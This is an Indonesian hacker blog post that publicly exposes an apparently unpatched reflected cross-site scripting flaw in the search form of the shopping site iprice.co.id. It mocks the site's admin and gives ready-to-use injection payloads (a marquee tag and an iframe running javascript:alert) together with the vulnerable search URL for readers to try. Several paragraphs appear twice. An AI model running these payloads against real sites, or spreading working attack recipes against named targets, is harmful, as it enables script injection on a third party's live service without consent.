iprice.co.id web pasaran 2019
"Okey,bro kali ini gue di kejutkan denggan bug yang berada di situs iprice.co.id dan bug ini sudah lama belum di pacth,entah adminya gk menghati'in / bego gk bisa pacth bug xss yang berada di form search...
"Disini gue coba gunain seperti biasa yaitu :
"><marquue>security-xploit.blogspot.com<marquee>
Nah udah jelas kan?website iprice.cont*l ini vuln XSS yok lanjut lagi...
" kali ini gue bakalan pake payload yang berbeda agar muncul popup di webnya:D
Payload : "><IFRAME SRC="javascript:alert('security-xploit.blogspot.com');"></IFRAME>
Dan hasilnya boom:V
https://iprice.co.id/search/?term=( Your Payload XSS )
" Nah mungkin segitu saja gan maaf kalau yang gue posting gk bermamfaat buat agan" dan abang" semua hehe...
"><marquue>security-xploit.blogspot.com<marquee>
" kali ini gue bakalan pake payload yang berbeda agar muncul popup di webnya:D
Payload : "><IFRAME SRC="javascript:alert('security-xploit.blogspot.com');"></IFRAME>
Dan hasilnya boom:V
" Nah mungkin segitu saja gan maaf kalau yang gue posting gk bermamfaat buat agan" dan abang" semua hehe...
Hello, my name is Faizal Acbar. I'm just a lazy person who wants to spend time with a simple blog.
Tidak ada komentar:
Posting Komentar
Komentar denggan sopan :')